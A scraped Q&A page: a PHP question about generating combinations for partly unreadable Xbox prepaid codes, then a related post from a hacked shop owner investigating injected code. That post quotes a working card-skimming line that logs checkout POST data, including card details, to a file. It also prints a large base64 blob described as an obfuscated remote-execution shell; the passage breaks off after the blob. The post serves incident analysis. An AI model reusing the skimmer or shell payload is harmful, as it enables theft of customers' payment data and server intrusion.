PHP code to replace certain values in array, code generator - php

I am trying to write PHP code as a hobby project to basically create a "possible" code generator. The scenario is that we have a list of 25 valid characters that can be used.
Imagine that you have a 25 character code but you have accidentally scratched off the first two characters or three characters at any location in the code. Now we need to find all the possible combinations to try out. I have put all the valid characters into the array below that can be used in the code.
$valid=array("B","C","D","F","G","H","J","K","M","P","Q","R","T","V","W","X","Y","Z",
"2","3","4","6","7","8","9");
$arraylength=count($valid);
The still available or seen characters are input into a text box, the place where a character is unreadable is left blank, and the variable values are fetched.
$char1= $_POST['code1'];
$char2= $_POST['code2'];
$char3= $_POST['code3'];
$char4= $_POST['code4'];
$char5= $_POST['code5'];
$char6= $_POST['code6'];
$char7= $_POST['code7'];
$char8= $_POST['code8'];
$char9= $_POST['code9'];
$char10= $_POST['code10'];
$char11= $_POST['code11'];
$char12= $_POST['code12'];
$char13= $_POST['code13'];
$char14= $_POST['code14'];
$char15= $_POST['code15'];
$char16= $_POST['code16'];
$char17= $_POST['code17'];
$char18= $_POST['code18'];
$char19= $_POST['code19'];
$char20= $_POST['code20'];
$char21= $_POST['code21'];
$char22= $_POST['code22'];
$char23= $_POST['code23'];
$char24= $_POST['code24'];
$char25= $_POST['code25'];
And put into an array...
$jada = array($char1, $char2, $char3, $char4, $char5, $char6, $char7, $char8, $char9, $char10, $char11, $char12, $char13, $char14, $char15
, $char16, $char17, $char18, $char19, $char20, $char21, $char22, $char23, $char24, $char25);
I have been stumped for a while now, the fiddling I have done at the moment is that if a variable is empty then do something (as a test echo or print the possible combinations)
if(!isset($char1) || trim($char1) == ""){
for($x=0;$x<$arraylength;$x++) {
echo $valid[$x];
echo "<br>";
} }
else{
echo ($char1);
}
Can you guys help out?

Saw this still in an open status after many years of hiatus, I figured that I may as well share some information.
In the end I figured it out, you can grab the source here and test it in your own server: https://github.com/Masterkriz/XBOX_Pre-paid_code_fixer

Related

Deobfuscating Malicious Code: What's the purpose of this code?

So this week our small business ecommerce site got hacked. We noticed that the files on the live server were out of sync with our svn repo. Two files having to do with verifying card numbers had this at the end:
@file_put_contents("/home/*****/public_html/errors/error_log.txt", "{$_SERVER["REMOTE_ADDR"]}, {$_SERVER["REQUEST_URI"]}:\n" . print_r($_POST, 1), FILE_APPEND);
It writes the current request to an error_log.txt file. This code runs when the user hits 'confirm purchase', so the request has the full payment info in it. Obviously, this is not good.
We reverted the files and started investigating. The file this line was in was a *.inc file, and not publicly visible. The attacker must have already had access to our file system to read our code, know that that particular file was called during checkout, and insert the line in the correct place.
Today I found another file tucked away in a rarely touched corner of the site. log.php seems to present an interface for remote code execution. It was heavily obfuscated. Here is my attempt at deobfuscating it. Scroll past the massive block of base64 encoded mystery code to see my comments.
<?php
$data=base64_decode(str_replace("\n", '', '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
